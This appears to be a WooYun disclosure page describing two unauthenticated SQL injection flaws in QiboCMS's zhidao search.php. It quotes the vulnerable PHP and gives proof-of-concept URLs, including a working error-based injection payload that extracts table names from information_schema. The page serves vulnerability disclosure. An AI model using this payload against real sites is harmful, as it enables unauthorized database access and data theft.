当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115138

漏洞标题:qibocms知道系统SQL注入2枚

相关厂商:齐博CMS

漏洞作者: 路人甲

提交时间:2015-05-20 14:44

修复时间:2015-05-25 14:46

公开时间:2015-05-25 14:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-20: 细节已通知厂商并且等待厂商处理中
2015-05-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

第一枚:
zhidao/search.php

$sort_where="where `qa_quantity`>0";
        foreach($forSearchKey as $key){
                $sort_where_a[]="BINARY `name` like('%$key%')";
        }
        if(count($sort_where_a)>0){
                $sort_where.=" AND (".implode(" or ",$sort_where_a).")";
                $query=$db->query("SELECT `fid`,`name`,`qa_quantity` FROM `{$_pre}sort` $sort_where ");
                while($rs=$db->fetch_array($query)){
                        $sort_list[]=$rs;
                }       
        }


语句中把先是赋值给数组sort_where_a,然后在分割为字符串赋给变量where
这本来是没有问题的,但是数组sort_where_a未初始化,结合齐博的伪全局机制就造成了sql注入(无限制 无需登录)
第二枚:
zhidao/search.php

if(count($forSearchKey)>2){
                        for($i=0;$i<ceil(count($forSearchKey)/2);$i++){
                                for($j=0;$j<count($forSearchKey);$j++){
                                        if($i!=$j){
                                                $fulltext[]=" (BINARY `title` like('%".$forSearchKey[$i]."%') AND BINARY `title` like('%".$forSearchKey[$j]."%'))";
                                        }
                                }
                        }
                        
                        $where.=" AND (".implode(" or ",$fulltext).")";
                        
                }


进入该语句需要count($forSearchKey)>2 但是forSearchKey我们是可以控制的
在第一个语句中把先是赋值给数组fullext,然后在分割为字符串赋给变量where()
这本来是没有问题的,但是数组fullext未初始化,结合齐博的伪全局机制就造成了sql注入(无限制 无需登录)
而在同一页面中带进了查询语句

$min=($page-1)*$rows;
        
        
        $query = $db->query("SELECT `aid`,`sortid`,`sid`,`info_cate`,`title`,`addtime`,`uid`,`username`,`content`,`money`,`isover`,`imgs` FROM {$_pre}content $where ORDER BY `addtime` DESC LIMIT $min,$rows");


漏洞证明:

http://localhost/zhidao/zhidao/search.php?&tags=ll%20ll%20ll&keyword=111&fulltext[]=11)

22.png


http://localhost/zhidao/zhidao/search.php?&tags=ll%20ll%20ll&keyword=111&fulltext[]=11)%20and%201=2%20union%20select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b%23

33.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-25 14:46

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2015-05-31 14:33 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    洞主 你选错类型 没选通用..

  2. 2015-06-15 21:51 | 小菜虫 ( 路人 | Rank:24 漏洞数:5 )

    @玉林嘎 选不选通用都没区别 反正没有奖金

  3. 2015-06-15 21:55 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    @小菜虫 怎么会没奖金呢

  4. 2015-06-15 22:03 | 小菜虫 ( 路人 | Rank:24 漏洞数:5 )

    @玉林嘎 不知道啊 我一直以为现在都没有了。。。